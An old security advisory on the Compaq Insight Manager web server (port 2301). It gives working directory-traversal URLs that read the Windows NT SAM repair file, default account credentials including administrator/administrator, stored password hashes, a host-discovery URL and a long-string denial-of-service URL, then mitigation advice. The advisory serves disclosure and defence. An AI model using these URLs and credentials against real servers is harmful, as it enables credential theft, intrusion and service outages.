COMMAND
Compaq Insight Manager
SYSTEMS AFFECTED
WinNT and Novell Netware servers running on Compaq hardware
PROBLEM
Following ia based on Infosec Security Vulnerability Report by
Gabriel Sandberg. The web server included in Compaq Insight
Manager could expose sensitive information. Anyone that have
access to port 2301 where Compaq Insight Manager is installed
could get unrestricted access to the servers disk through the
"root dot dot" bug.
When installing Compaq Insight Manager a web server gets
installed. This web server runs on port 2301 and is vulnerable to
the old "root dot dot" bug. This bug gives unrestricted access to
the vulnerable server?s disk. It could easily get exploited with
one of the URLs:
http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf
(How many dots there should be is install-dependent). Infosec
gives the credits to Master Dogen who first reported the problem.
Vacuum added following. Web-Based Management is enabled, by
default, when you install the Compaq Server Management Agents for
Windows NT.(CPQWMGMT.EXE) The web-enabled Compaq Server Management
Agents allow you to view subsystem and status information from a
web browser, either locally or remotely. Web-enabled Service
Management Agents are availible in all 4.x versions of Insight
Manager. Compaq HTTP Server Version 1.2.15 (Pre-Release); the
only user accounts available in the Compaq Server Management
Agent WEBEM release are listed below.
http://111.111.111.111:2301/cpqlogin.htm
account anonymous
username anonymous
password
account user
username user
password public
account operator
username operator
password operator
account administrator
username administrator
password administrator
http://111.111.111.111:2301/cpqlogin.htm?ChangePassword=yes
is the url used to change the password. Unfortunately the
password is the only information that can be changed and is stored
in some kind of chiper text in the c:\compaq\wbem\cpqhmmd.acl:
Compaq-WBEM-AclFile, 1.1
anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F
login in progress... login in progress...
7A21DD9917C0C23907267FC07DBC7D12
administrator administrator D6022D9B3FCA717CCEED36E640160478
51B02137D6BF719FC62F4940DBE1F3E6
operator operator B5CE548356D1BEA5F1CFEE12FE9502C3
041D1015AEC9F60412C7F86E62D6672C
user user
EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A
Once you have found one wbem enabled machine, using compaq's HTTP
Auto-Discovery Device List http://111.111.111.111:2301/cpqdev.htm
it is trivial to locate other machines.
There are three types of data:
Default(read only)
Sets(read/write)
Reboot(read/write)
The WebAgent.ini file in the system_root\CpqMgmt\WebAgent
directory specifies the level of user that has access to data.
The "read=" and "write=" entries in the file set the user accounts
required for access, where: 0=No access, 1=Anonymous, 2=User,
3=Operator, and 4=Administrator. Changing these entries changes
the security. The web-enabled Server Agent service must be
stopped and restarted for any changes to take effect. Do not
modify anything except the read/write levels.
There's also denial of service:
http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the minimum)
The first time this occurs, an application error occurs in
surveyor.exe Exception: access violation (0xc0000005), Address:
0x100333e5. If you restart the Insight Web Agent Service and
repeat it will cause an application error in cpqwmget.exe
Exception: access violation(0xc0000005), Address 0x002486d4. The
http://111.111.111.111 will no longer respond until the service is
stopped and restarted.
SOLUTION
You could probably fix the problem by restricting anonymous access
to the Compaq Insight Manager web server. If you are not using the
web server, Infosec recommends disabling the service. To
completely remove the problem, make sure you also stop the
"surveryor" service as well if you have that installed. That will
completely shut off access to port 2301 and plug the hole.